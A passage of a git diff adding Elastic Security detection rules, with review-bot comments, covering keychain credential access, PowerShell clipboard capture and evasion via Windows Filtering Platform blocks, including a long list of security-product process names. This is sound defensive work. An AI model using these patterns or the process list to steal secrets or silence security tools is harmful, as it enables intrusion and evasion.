If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.003", + "name": "Credentials from Web Browsers", + "reference": "https://attack.mitre.org/techniques/T1555/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json new file mode 100644 index 00000000000..728520c0490 
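Review bot: The `description` has a grammatical slip, "from a system to in order to acquire credentials"; it should read `Adversaries may collect keychain storage data from a system in order to acquire credentials.`. The `not process.parent.executable : "/Applications/Keeper Password Manager.app/..."` exception is a plain path match, so anything launched from that path is exempt; given `false_positives` already names password managers generally, a `note` telling analysts to confirm the parent's code signature before trusting that exception would strengthen triage — I have not checked whether a signature field is available on these events.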
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json 
@@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\program?files\\\\powershell\\\\?\\\\Modules\\\\*.psd1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\*.psd1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Clipboard Retrieval Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to get the contents of the clipboard with the goal of stealing credentials and other valuable information, such as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users are unlikely to use scripting utilities to capture contents of the clipboard, making false positives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (powershell.file.script_block_text : (\n \"Windows.Clipboard\" or\n \"Windows.Forms.Clipboard\" or\n \"Windows.Forms.TextBox\"\n ) and\n powershell.file.script_block_text : (\n \"]::GetText\" or\n \".Paste()\"\n )) or powershell.file.script_block_text : \"Get-Clipboard\" and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n ) and\n not user.id : \"S-1-5-18\" and\n not (\n file.path : C\\:\\\\Program?Files\\\\WindowsPowerShell\\\\*Modules*.ps1 and\n file.name : (\"Convert-ExcelRangeToImage.ps1\" or \"Read-Clipboard.ps1\")\n )\n", + "references": [ + 
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "92984446-aefb-4d5e-ad12-598042ca80ba_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json new file mode 100644 index 00000000000..6183b33a715 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Clipboard Retrieval Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to get the contents of the clipboard with the goal of stealing credentials and other valuable information, such as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users are unlikely to use scripting utilities to capture contents of the clipboard, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (powershell.file.script_block_text : (\n \"Windows.Clipboard\" or\n \"Windows.Forms.Clipboard\" or\n \"Windows.Forms.TextBox\"\n ) and\n powershell.file.script_block_text : (\n \"]::GetText\" or\n \".Paste()\"\n )) or powershell.file.script_block_text : \"Get-Clipboard\" and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : (\n ?\\:\\\\\\\\program?files\\\\\\\\powershell\\\\\\\\?\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1\n ) and \n not (\n file.path : ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\*Modules*.ps1 and\n file.name : (\"Convert-ExcelRangeToImage.ps1\" or \"Read-Clipboard.ps1\")\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": 
"92984446-aefb-4d5e-ad12-598042ca80ba_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json new file mode 100644 index 00000000000..9dcd98af262 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple Windows Filtering Platform block events and where the process name is related to an endpoint security software. Adversaries may add malicious WFP rules to prevent Endpoint security from sending telemetry.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Windows Filtering Platform", + "query": "sequence by winlog.computer_name with maxspan=1m\n [network where host.os.type == \"windows\" and \n event.action : (\"windows-firewall-packet-block\", \"windows-firewall-packet-drop\") and \n process.name : (\n \"bdagent.exe\", \"bdreinit.exe\", \"pdscan.exe\", \"pdiface.exe\", \"BDSubWiz.exe\", \"ProductAgentService.exe\",\n \"ProductAgentUI.exe\", \"WatchDog.exe\", \"CarbonBlackClientSetup.exe\", \"TrGUI.exe\", \"TracCAPI.exe\", \"cpmsi_tool.exe\",\n \"trac.exe\", \"vna_install64.exe\", \"vna_utils.exe\", \"TracSrvWrapper.exe\", \"vsmon.exe\", \"p95tray.exe\",\n \"CybereasonRansomFreeServiceHost.exe\", \"CrAmTray.exe\", \"minionhost.exe\", \"CybereasonSensor.exe\", \"CylanceUI.exe\",\n \"CylanceProtectSetup.exe\", \"cylancesvc.exe\", \"cyupdate.exe\", \"elastic-agent.exe\", \"elastic-endpoint.exe\",\n \"egui.exe\", \"minodlogin.exe\", \"emu-rep.exe\", \"emu_install.exe\", \"emu-cci.exe\", \"emu-gui.exe\", \"emu-uninstall.exe\",\n \"ndep.exe\", \"spike.exe\", \"ecls.exe\", \"ecmd.exe\", \"ecomserver.exe\", \"eeclnt.exe\", \"eh64.exe\", \"EHttpSrv.exe\",\n \"xagt.exe\", \"collectoragent.exe\", \"FSAEConfig.exe\", \"uninstalldcagent.exe\", \"rmon.exe\", \"fccomint.exe\",\n \"fclanguageselector.exe\", \"fortifw.exe\", \"fcreg.exe\", \"fortitray.exe\", \"fcappdb.exe\", \"fcwizard.exe\", \"submitv.exe\",\n \"av_task.exe\", \"fortiwf.exe\", \"fortiwadbd.exe\", \"fcauth.exe\", \"fcdblog.exe\", \"fcmgr.exe\", \"fortiwad.exe\",\n 
\"fortiproxy.exe\", \"fortiscand.exe\", \"fortivpnst.exe\", \"ipsec.exe\", \"fcwscd7.exe\", \"fcasc.exe\", \"fchelper.exe\",\n \"forticlient.exe\",\"fcwsc.exe\", \"FortiClient.exe\", \"fmon.exe\", \"FSSOMA.exe\", \"FCVbltScan.exe\", \"FortiESNAC.exe\",\n \"EPCUserAvatar.exe\", \"FortiAvatar.exe\", \"FortiClient_Diagnostic_Tool.exe\", \"FortiSSLVPNdaemon.exe\", \"avp.exe\",\n \"FCConfig.exe\", \"avpsus.exe\", \"klnagent.exe\", \"klnsacwsrv.exe\", \"kl_platf.exe\", \"stpass.exe\", \"klnagwds.exe\",\n \"mbae.exe\", \"mbae64.exe\", \"mbae-svc.exe\", \"mbae-uninstaller.exe\", \"mbaeLoader32.exe\", \"mbaeloader64.exe\",\n \"mbam-dor.exe\", \"mbamgui.exe\", \"mbamservice.exe\", \"mbamtrayctrl.exe\", \"mbampt.exe\", \"mbamscheduler.exe\",\n \"Coreinst.exe\", \"mbae-setup.exe\", \"mcupdate.exe\", \"ProtectedModuleHost.exe\", \"ESConfigTool.exe\", \"FWInstCheck.exe\",\n \"FwWindowsFirewallHandler.exe\", \"mfeesp.exe\", \"mfefw.exe\", \"mfeProvisionModeUtility.exe\", \"mfetp.exe\", \"avpui.exe\", \n \"WscAVExe.exe\", \"mcshield.exe\", \"McChHost.exe\", \"mfewc.exe\", \"mfewch.exe\", \"mfewcui.exe\", \"fwinfo.exe\",\n \"mfecanary.exe\", \"mfefire.exe\", \"mfehidin.exe\", \"mfemms.exe\", \"mfevtps.exe\", \"mmsinfo.exe\", \"vtpinfo.exe\",\n \"MarSetup.exe\", \"mctray.exe\", \"masvc.exe\", \"macmnsvc.exe\", \"McAPExe.exe\", \"McPvTray.exe\", \"mcods.exe\",\n \"mcuicnt.exe\", \"mcuihost.exe\", \"xtray.exe\", \"McpService.exe\", \"epefprtrainer.exe\", \"mfeffcoreservice.exe\",\n \"MfeEpeSvc.exe\", \"qualysagent.exe\", \"QualysProxy.exe\", \"QualysAgentUI.exe\", \"SVRTgui.exe\", \"SVRTcli.exe\",\n \"SVRTcli.exe\", \"SVRTgui.exe\", \"SCTCleanupService.exe\", \"SVRTservice.exe\", \"native.exe\", \"SCTBootTasks.exe\",\n \"ALMon.exe\", \"SAA.exe\", \"SUMService.exe\", \"ssp.exe\", \"SCFService.exe\", \"SCFManager.exe\", \"spa.exe\", \"cabarc.exe\",\n \"sargui.exe\", \"sntpservice.exe\", \"McsClient.exe\", \"McsAgent.exe\", \"McsHeartbeat.exe\", \"SAVAdminService.exe\",\n 
\"sav32cli.exe\", \"ForceUpdateAlongSideSGN.exe\", \"SAVCleanupService.exe\", \"SavMain.exe\", \"SavProgress.exe\", \n \"SavProxy.exe\", \"SavService.exe\", \"swc_service.exe\", \"swi_di.exe\", \"swi_service.exe\", \"swi_filter.exe\",\n \"ALUpdate.exe\", \"SophosUpdate.exe\", \"ALsvc.exe\", \"SophosAlert.exe\", \"osCheck.exe\", \"N360Downloader.exe\",\n \"InstWrap.exe\", \"symbos.exe\", \"nss.exe\", \"symcorpui.exe\", \"isPwdSvc.exe\", \"ccsvchst.exe\", \"ntrmv.exe\",\n \"pccntmon.exe\", \"AosUImanager.exe\", \"NTRTScan.exe\", \"TMAS_OL.exe\", \"TMAS_OLImp.exe\", \"TMAS_OLSentry.exe\",\n \"ufnavi.exe\", \"Clnrbin.exe\", \"vizorhtmldialog.exe\", \"pwmConsole.exe\", \"PwmSvc.exe\", \"coreServiceShell.exe\",\n \"ds_agent.exe\", \"SfCtlCom.exe\", \"MBAMHelper.exe\", \"cb.exe\", \"smc.exe\", \"tda.exe\", \"xagtnotif.exe\", \"ekrn.exe\",\n \"dsa.exe\", \"Notifier.exe\", \"rphcp.exe\", \"lc_sensor.exe\", \"CSFalconService.exe\", \"CSFalconController.exe\",\n \"SenseSampleUploader.exe\", \"windefend.exe\", \"MSASCui.exe\", \"MSASCuiL.exe\", \"msmpeng.exe\", \"msmpsvc.exe\",\n \"MsSense.exe\", \"esensor.exe\", \"sentinelone.exe\", \"tmccsf.exe\", \"csfalconcontainer.exe\", \"sensecncproxy.exe\",\n \"splunk.exe\", \"sysmon.exe\", \"sysmon64.exe\", \"taniumclient.exe\"\n )] with runs=5\n", + "references": [ + "https://github.com/dsnezhkov/shutter/tree/main", + "https://github.com/netero1010/EDRSilencer/tree/main", + "https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { 
+ "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92d3a04e-6487-4b62-892d-70e640a590dc", + "setup": "## Setup\n\nThe 'Filtering Platform Connection' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nFiltering Platform Connection (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "92d3a04e-6487-4b62-892d-70e640a590dc_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json new file mode 100644 index 00000000000..fe9d78a4caa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json 
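Review bot: The `process.name` list in the query carries duplicate entries: `"SVRTgui.exe", "SVRTcli.exe"` appear twice in a row, and `"forticlient.exe"` and `"FortiClient.exe"` are the same value under the case-insensitive `:` operator, so one of each pair can be dropped (the `"forticlient.exe","fcwsc.exe"` pair is also missing the space every other separator has). The rule is tagged `"Data Source: Elastic Defend"`, yet its `index` patterns are `winlogbeat-*`, `logs-windows.*` and `logs-system.security-*` and `related_integrations` lists only `system` and `windows`, so the tag appears not to match the data the query actually reads; worth confirming against the upstream rule source. The same list and tag are repeated in the `_3` version of this rule in the next hunk, where only the `logs-windows.*` pattern has been narrowed to `logs-windows.network-*`. Since these files are synced from the rule repository, the fix belongs upstream rather than in this package.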
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple Windows Filtering Platform block events and where the process name is related to an endpoint security software. Adversaries may add malicious WFP rules to prevent Endpoint security from sending telemetry.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.network-*", + "logs-system.security-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Windows Filtering Platform", + "query": "sequence by winlog.computer_name with maxspan=1m\n [network where host.os.type == \"windows\" and \n event.action : (\"windows-firewall-packet-block\", \"windows-firewall-packet-drop\") and \n process.name : (\n \"bdagent.exe\", \"bdreinit.exe\", \"pdscan.exe\", \"pdiface.exe\", \"BDSubWiz.exe\", \"ProductAgentService.exe\",\n \"ProductAgentUI.exe\", \"WatchDog.exe\", \"CarbonBlackClientSetup.exe\", \"TrGUI.exe\", \"TracCAPI.exe\", \"cpmsi_tool.exe\",\n \"trac.exe\", \"vna_install64.exe\", \"vna_utils.exe\", \"TracSrvWrapper.exe\", \"vsmon.exe\", \"p95tray.exe\",\n \"CybereasonRansomFreeServiceHost.exe\", \"CrAmTray.exe\", \"minionhost.exe\", \"CybereasonSensor.exe\", \"CylanceUI.exe\",\n \"CylanceProtectSetup.exe\", \"cylancesvc.exe\", \"cyupdate.exe\", \"elastic-agent.exe\", \"elastic-endpoint.exe\",\n \"egui.exe\", \"minodlogin.exe\", \"emu-rep.exe\", \"emu_install.exe\", \"emu-cci.exe\", \"emu-gui.exe\", \"emu-uninstall.exe\",\n \"ndep.exe\", \"spike.exe\", \"ecls.exe\", \"ecmd.exe\", \"ecomserver.exe\", \"eeclnt.exe\", \"eh64.exe\", \"EHttpSrv.exe\",\n \"xagt.exe\", \"collectoragent.exe\", \"FSAEConfig.exe\", \"uninstalldcagent.exe\", \"rmon.exe\", \"fccomint.exe\",\n \"fclanguageselector.exe\", \"fortifw.exe\", \"fcreg.exe\", \"fortitray.exe\", \"fcappdb.exe\", \"fcwizard.exe\", \"submitv.exe\",\n \"av_task.exe\", \"fortiwf.exe\", \"fortiwadbd.exe\", \"fcauth.exe\", \"fcdblog.exe\", \"fcmgr.exe\", 
\"fortiwad.exe\",\n \"fortiproxy.exe\", \"fortiscand.exe\", \"fortivpnst.exe\", \"ipsec.exe\", \"fcwscd7.exe\", \"fcasc.exe\", \"fchelper.exe\",\n \"forticlient.exe\",\"fcwsc.exe\", \"FortiClient.exe\", \"fmon.exe\", \"FSSOMA.exe\", \"FCVbltScan.exe\", \"FortiESNAC.exe\",\n \"EPCUserAvatar.exe\", \"FortiAvatar.exe\", \"FortiClient_Diagnostic_Tool.exe\", \"FortiSSLVPNdaemon.exe\", \"avp.exe\",\n \"FCConfig.exe\", \"avpsus.exe\", \"klnagent.exe\", \"klnsacwsrv.exe\", \"kl_platf.exe\", \"stpass.exe\", \"klnagwds.exe\",\n \"mbae.exe\", \"mbae64.exe\", \"mbae-svc.exe\", \"mbae-uninstaller.exe\", \"mbaeLoader32.exe\", \"mbaeloader64.exe\",\n \"mbam-dor.exe\", \"mbamgui.exe\", \"mbamservice.exe\", \"mbamtrayctrl.exe\", \"mbampt.exe\", \"mbamscheduler.exe\",\n \"Coreinst.exe\", \"mbae-setup.exe\", \"mcupdate.exe\", \"ProtectedModuleHost.exe\", \"ESConfigTool.exe\", \"FWInstCheck.exe\",\n \"FwWindowsFirewallHandler.exe\", \"mfeesp.exe\", \"mfefw.exe\", \"mfeProvisionModeUtility.exe\", \"mfetp.exe\", \"avpui.exe\", \n \"WscAVExe.exe\", \"mcshield.exe\", \"McChHost.exe\", \"mfewc.exe\", \"mfewch.exe\", \"mfewcui.exe\", \"fwinfo.exe\",\n \"mfecanary.exe\", \"mfefire.exe\", \"mfehidin.exe\", \"mfemms.exe\", \"mfevtps.exe\", \"mmsinfo.exe\", \"vtpinfo.exe\",\n \"MarSetup.exe\", \"mctray.exe\", \"masvc.exe\", \"macmnsvc.exe\", \"McAPExe.exe\", \"McPvTray.exe\", \"mcods.exe\",\n \"mcuicnt.exe\", \"mcuihost.exe\", \"xtray.exe\", \"McpService.exe\", \"epefprtrainer.exe\", \"mfeffcoreservice.exe\",\n \"MfeEpeSvc.exe\", \"qualysagent.exe\", \"QualysProxy.exe\", \"QualysAgentUI.exe\", \"SVRTgui.exe\", \"SVRTcli.exe\",\n \"SVRTcli.exe\", \"SVRTgui.exe\", \"SCTCleanupService.exe\", \"SVRTservice.exe\", \"native.exe\", \"SCTBootTasks.exe\",\n \"ALMon.exe\", \"SAA.exe\", \"SUMService.exe\", \"ssp.exe\", \"SCFService.exe\", \"SCFManager.exe\", \"spa.exe\", \"cabarc.exe\",\n \"sargui.exe\", \"sntpservice.exe\", \"McsClient.exe\", \"McsAgent.exe\", \"McsHeartbeat.exe\", 
